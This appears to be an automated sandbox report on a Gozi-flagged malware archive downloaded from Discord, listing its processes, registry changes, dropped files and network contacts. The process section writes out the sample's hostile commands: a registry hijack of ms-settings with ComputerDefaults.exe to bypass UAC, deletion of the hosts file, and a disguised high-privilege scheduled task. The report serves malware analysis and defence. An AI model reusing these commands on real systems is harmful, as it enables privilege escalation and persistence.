Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1216836182860628050/1216845019185418340/gen_build.zip?ex=6601de3c&is=65ef693c&hm=d1a1eca8ddeec67d4541910893b2b076143ae403d58fa7b7faf2aa262e14cdda& was found to be: Known bad.
Malicious Activity Summary
Gozi
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Modifies data under HKEY_USERS
Modifies registry class
NTFS ADS
Enumerates system info in registry
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-11 20:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-11 20:37
Reported
2024-03-11 20:38
Platform
win11-20240221-en
Max time kernel
57s
Max time network
58s
Command Line
Signatures
Gozi
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133546630646097623" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\chinahalf1930182.vbs" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\gen_build.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1216836182860628050/1216845019185418340/gen_build.zip?ex=6601de3c&is=65ef693c&hm=d1a1eca8ddeec67d4541910893b2b076143ae403d58fa7b7faf2aa262e14cdda&
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9351d9758,0x7ff9351d9768,0x7ff9351d9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN TwitchUpdater_A7Q2drImVArLnmrvI050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\A7Q2drImVArLnmrvI050MX.exe" /RL HIGHEST /IT
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN TwitchUpdater_A7Q2drImVArLnmrvI050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\A7Q2drImVArLnmrvI050MX.exe" /RL HIGHEST /IT
C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe
"C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe" explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 104.21.79.145:443 | textpubshiers.top | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
Files
\??\pipe\crashpad_2284_SNVMLDAIKDMCOGZA
C:\Users\Admin\Downloads\gen_build.zip:Zone.Identifier
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\Downloads\gen_build.zip
C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs
C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll
C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe